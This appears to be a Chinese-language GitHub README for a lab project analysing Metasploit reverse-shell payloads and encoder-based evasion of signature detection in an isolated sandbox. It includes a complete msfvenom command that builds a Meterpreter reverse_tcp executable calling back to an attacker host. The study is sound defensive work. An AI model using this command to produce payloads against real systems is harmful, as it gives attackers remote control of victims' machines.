athrenX/malware-defense-evasion-analysis

# 🦠 恶意软件分析 & 防御规避：反向Shell有效载荷 **作者:** Athala Angwyn Renaldi | **角色:** 初级网络安全分析师 ## 📌 执行摘要 本存储库记录了基于Metasploit的反向Shell有效载荷的静态和动态分析。主要目标是评估多态编码（`shikata_ga_nai`）绕过基于签名的检测系统的有效性，并制定高级端点缓解策略。 🔗 **[查看完整技术报告（PDF）](docs/AG_MALWARE.pdf)** ## 🏗️ 环境设置 分析在一个完全隔离的沙箱环境中进行，以防止意外感染或网络泄漏。 * **攻击者节点:** Kali Linux（IP：192.168.25.129） * **受害者节点:** Windows 10（IP：192.168.25.128） * **网络适配器:** 主机仅配置（100% 隔离） ## 🛠️ 有效载荷生成（MSFvenom） 为了比较分析，生成了两种有效载荷变体： 1. **原始有效载荷（`normal.exe`）:** 未进行混淆的基线有效载荷。 ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.25.129 LPORT=4444 -f exe > normal.exe ```

标签：DAST, Meterpreter, Windows 10, 云安全监控, 云资产清单, 代码混淆, 反取证, 威胁情报, 安全事件响应, 安全测试, 安全漏洞, 安全策略, 安全评估, 安全防护, 开发者工具, 开发者评论分析, 恶意软件分析, 提示词设计, 攻击性安全, 沙箱环境, 私有化部署, 端点安全, 签名检测, 补丁管理, 逆向壳, 逆向工具, 逆向工程, 防御规避, 静态分析